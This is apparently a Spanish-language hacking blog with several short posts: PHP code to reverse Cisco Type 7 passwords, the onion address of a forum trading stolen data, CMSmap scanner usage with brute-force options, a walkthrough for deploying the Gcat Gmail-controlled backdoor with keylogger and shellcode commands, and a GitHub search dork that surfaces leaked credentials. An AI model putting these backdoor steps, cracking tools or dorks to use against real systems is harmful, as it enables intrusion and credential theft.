22/4/16

Cisco Password Decrypter Online & Code



Online Cisco Password Decrypter 



Cisco Password Decrypter for PHP (CodeIgniter v2.1.3)


The CodeIgniter view (decrypter_view.php)


<html>
    <head>
        <title>Cisco Password Decrypter by RedTeam Security</title>
    </head>
    <body>
        <p>
            <?php echo $this->session->flashdata('messages'); ?>   
        </p><br><br>
        <p>Enter the password you'd like to decrypt:</p>
        <p>
            <form action="<?php echo base_url(); ?>decrypter/doCiscoDecrypt" method="post">
                <input type="text" id="ciscocipher" name="ciscocipher" />
                <input type="submit" value="Decrypt" />
            </form>
        </p>
</html>




The CodeIgniter controller (decrypter.php)
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class Decrypter extends CI_Controller {

    public function index()
    {
        /*
         * Display the decrypter page
         */
        
        $this->load->view('decrypter_view');
    }    
    
    public function doCiscoDecrypt()
    {
        /*
         * Decrypt Cisco Type 7 Password
         */
        
       // Load CI libraries/helpers
        $this->load->helper('security');
        $this->load->library('session');        
        
        // Get form post value and sanitize
        $pass = xss_clean(trim($this->input->post('ciscocipher')));
        
        if ($pass)
        {
            if (filter_var($pass, FILTER_SANITIZE_STRING))
            {
                // Clear vars
                $z = 0;
                $decrypted = '';
                
                // Set array
                $x = array (0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b,
                            0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69,
                            0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
                            0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
                            0x55, 0x42);

                $unenc_length = (strlen($pass)-2)/2;
                $XORindex = (($pass[0]-0)*10)+($pass[1]-0);
                settype($XORindex, "integer");

                for ($i = 2 ; $i <= strlen($pass); $i=$i+2) 
                {
                    $val=(hexdec($pass[$i])*16)+hexdec($pass[$i+1]);
                    settype($val, "integer");
                    $passdec[$z]=chr($val ^ $x[$XORindex]);
                    $z++;
                    $XORindex++;
                }

                for ($t=0;$t<=$unenc_length-1;$t++) 
                {
                    $decrypted .= $passdec[$t];
                }
   
                // Display password to user and redirect
                $this->session->set_flashdata('messages', 'The decrypted password is: '.$decrypted);
                redirect(base_url().'decrypter');                      
            } else {
                // Error, display message and redirect
                $this->session->set_flashdata('messages', 'Encountered an error processing the password. Try again!');
                redirect(base_url().'decrypter');                   
            }
        } else {
            // Error, display message and redirect
            $this->session->set_flashdata('messages', 'All fields are required. Try again!');
            redirect(base_url().'decrypter');            
        }        
    }
}

/* End of file decrypter.php */
/* Location: ./system/application/controllers/decrypter.php */

4/3/16

Hell, un foro en la Dark Web

Hell, un foro en la Dark Web en la que se comparten datos robados, técnicas de hacking y otra información *interesante*

la URL de Tor para acceder al blog es http://legionhiden4dqh4.onion (o con tor2web http://legionhiden4dqh4.onion.to).


http://www.hackplayers.com/2016/01/el-infierno-ha-vuelto.html

theZoo aka Malware DB

Malware DB is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis we have decided to gather all of them for you in an available and safe way.

http://ytisf.github.io/theZoo/

12/8/15

CMSMAP

CMSmap  es un escaneador open source escrito en python, esta diseñado para detectar posibles vulnerabilidades y brechas de seguridad en los CMS mas populares como WordPress, Joomla y Drupal.

https://github.com/Dionach/CMSmap

La intalacion es Sencilla:

git clone https://github.com/Dionach/CMSmap.git
 
USO:
 
CMSmap tool v0.6 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t 
Targets:
     -t, --target    target URL (e.g. 'https://example.com:8080/')
     -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
     -F, --fullscan  full scan using large plugin lists. False positives and slow!
     -a, --agent     set custom user-agent
     -T, --threads   number of threads (Default: 5)
     -i, --input     scan multiple targets listed in a given text file
     -o, --output    save output in a file
     --noedb         enumerate plugins without searching exploits

Brute-Force:
     -u, --usr       username or file
     -p, --psw       password or file
     --noxmlrpc      brute forcing WordPress without XML-RPC

Post Exploitation:
     -k, --crack     password hashes file (Require hashcat installed. For WordPress and Joomla only)
     -w, --wordlist  wordlist file

Others:
     -v, --verbose   verbose mode (Default: false)
     -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll
     -h, --help      show this help

Examples:
     cmsmap.py -t https://example.com
     cmsmap.py -t https://example.com -f W -F --noedb
     cmsmap.py -t https://example.com -i targets.txt -o output.txt
     cmsmap.py -t https://example.com -u admin -p passwords.txt
     cmsmap.py -k hashes.txt -w passwords.txt
 
 
  

11/8/15

Gcat, un backdoor escrito en Python que utiliza Gmail como C&C

En Hackplayers lei un excelente post sobre gcat, que como el nombre del titulo lo dice, es un backdoor escrito en python que utiliza a gmail como servidor de comando y control. Entonces me di a la tarea de hacer un PoC  sobre esta herramienta.

Para ello tenemos que crear una cuenta en Gmail, se recomineda no usar tus cuentas personales y tener una asilada para esto. Despues  dentro del mismo README.md nos dice que tenemos que cambiar la configuracion de la cuenta y activar " permitir aplicaciones menos seguras", esto lo podemos hacer en el siguiente enlace:

https://www.google.com/settings/security/lesssecureapps

Posteriormente clonamos los archivos del github:

https://github.com/byt3bl33d3r/gcat

#git clone https://github.com/byt3bl33d3r/gcat.git

Una vez realizado esto, encontraremos dos archivos  el gcat.py, que es el script de control de comandos y el implant.py, quien es el backdoor y que probablemente quisieramos compilarlo en un .exe con pyintaller tal como lo dice el README. (You're probably going to want to compile ```implant.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller))

Bien ahora, en ambos .py modificamos las variables:
gmail_user
gmail_pwd

Con los datos correspondientes a nuestra cuenta.

Copio y pego el uso de la herramienta ya antes visto en Hackplayers y al final les comparto un video con la PoC de esta herramienta.


Uso:

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Una vez que has implementado el backdoor en un par de sistemas, puedes comprobar los clientes disponibles utilizando el comando list:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

La salida es una cadena UUID que identifica de forma exclusiva el sistema y SO donde el backdoor se está ejecutando.

Ahora vamos a mandar un comando a un equipo infectado:

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Aquí le estamos diciendo a 90b2cd83-cb36-52de-84ee-99db6ff41a11 que ejecute ipconfig / all, luego el script mostrará el JobID que podremos utilizar para recuperar la salida de ese comando:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

https://www.youtube.com/watch?v=EFxH1c8yQXs



10/8/15

Github Dork

Excelente Github Dork para users y passwords

https://github.com/search?p=1&q=filename%3Asftp-config.json+host+user+password&ref=searchresults&type=Code&utf8=%E2%9C%93




Herramienta para recuperar los archivos cifrados por el ransomware TeslaCrypt, una variante de CryptoLocker

Herramienta para recuperar los archivos cifrados por el ransomware TeslaCrypt, una variante de CryptoLocker Cifrar los archivos de la víctima y luego pedir bitcoins para descifrarlos es un negocio muy lucrativo: las campañas de ramsonware se están convirtiendo en una amenaza cada vez mayor. Después de la caída de CryptoLocker surgió Cryptowall, con técnicas anti-depuración avanzadas, y después numerosas variantes que se incluyen en campañas dirigidas cada vez más numerosas.

Una de las últimas variantes se llama TeslaCrypt y parece ser un derivado del ransomware CryptoLocker original. Este ransomware está dirigido específicamente a gamers y, aunque dice estar usando RSA-2048 asimétrico para cifrar archivos, realmente está usando AES simétrico, lo que ha permitido a Talos Group (Talos Security Intelligence & Research Group) desarrollar una herramienta que descifra los archivos...

 Toda la info completa en este excelente blog: HACKPLAYERS

http://www.hackplayers.com/2015/04/recuperar-los-archivos-cifrados-con-teslacrypt.html